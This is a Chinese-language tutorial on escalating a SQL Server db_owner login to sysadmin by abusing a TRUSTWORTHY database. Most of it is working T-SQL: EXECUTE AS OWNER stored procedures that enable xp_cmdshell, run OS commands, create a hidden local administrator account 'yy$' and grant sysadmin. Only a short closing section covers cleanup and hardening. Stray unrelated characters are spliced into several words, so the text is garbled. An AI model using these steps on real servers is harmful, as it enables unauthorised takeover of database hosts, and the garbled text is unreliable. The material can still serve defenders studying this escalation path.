SQL SERVER数据库账号提取服务器权限(二)
1、一、新建数据库和账号create database testDB; --Create databas髫潋啜缅eselect SUSER_SNAME(owner_sid) from sys.databases where name = 'testDB' --verify sa is the owner of the application databasecreate login testDBuser with password = 'mYPass@word' --Create loginuse testDBgoalter login testDBuser with default_database = testDB --set testDB is the default database of the logincreate user testuser from login testDBuser --crete user
2、二、分配数据库db_owner权限--set db_owner role of the u衡痕贤伎serexec sp_addrolemember db_owner,testuser-- Verify the user was added as db_ownerselect rp.name as database_role, mp.name as database_userfrom sys.database_role_members drmjoin sys.database_principals rp on (drm.role_principal_id = rp.principal_id)join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)
3、三、设置测试数据库为可信--设置testDB数据库为可信ALTER DATABASE testDB SET TRUSTWORTHY ON--查询可信数据库信息,testDB以及MSDB数据库被标记成可信SELECT a.name,b.is_trustworthy_onFROM master..sysdatabases as a INNER JOIN sys.databases as b ON a.name=b.name;
4、四、利用存储过程执行提权禅旄褡瘦命令一使用testDBuser用户登陆SQL Server,然后执行TSQL,创建一个名为sp_elevate1的存储过程。这个存储夸臾蓠鬏过程在OWNER权限中运行,这是sa帐户存在的情况。由于是使用sa权限登录的,所以这可能将testDBuser加入系统管理员组。use testDBgocreate procedure sp_elevate1with execute as ownerasexec sp_configure 'show advanced option',1 -- Enable show optionsreconfigureexec sp_configure 'xp_cmdshell',1 -- Enable xp_cmdshellreconfigureexec master..xp_cmdshell 'whoami'exec master.dbo.xp_cmdshell 'query user'goexec sp_elevate1
5、use testDBgoCREATE PROCEDURE xxxWITH EXECUTE AS OWNERASexec master..xp_cmdshell 'net user yy$ Yy@hack.com /add'exec master..xp_cmdshell 'net localgroup administrators yy$ /add'
6、五、利用存储过程执行提权命令二使用testDBuser用户登陆SQL Server,然后执行TSQL,创建一个名为sp_elevate2的存储过程。USE testDBGOCREATE PROCEDURE sp_elevate2WITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember 'testDBuser','sysadmin'GOexec sp_elevate2
7、SELECT is_srvrolemember('sysadmin')
8、六、删除账号并重新配置数据库1、net user yy$ /del2、将被影响的数据库“TRUSTWORTHY”设置为off(包括MSDB), 防止在存储过程中执行xp_cmdshell和一些其他恶意的操作3、关闭数据库中有sysadmin权限的用户具有sysadmin权限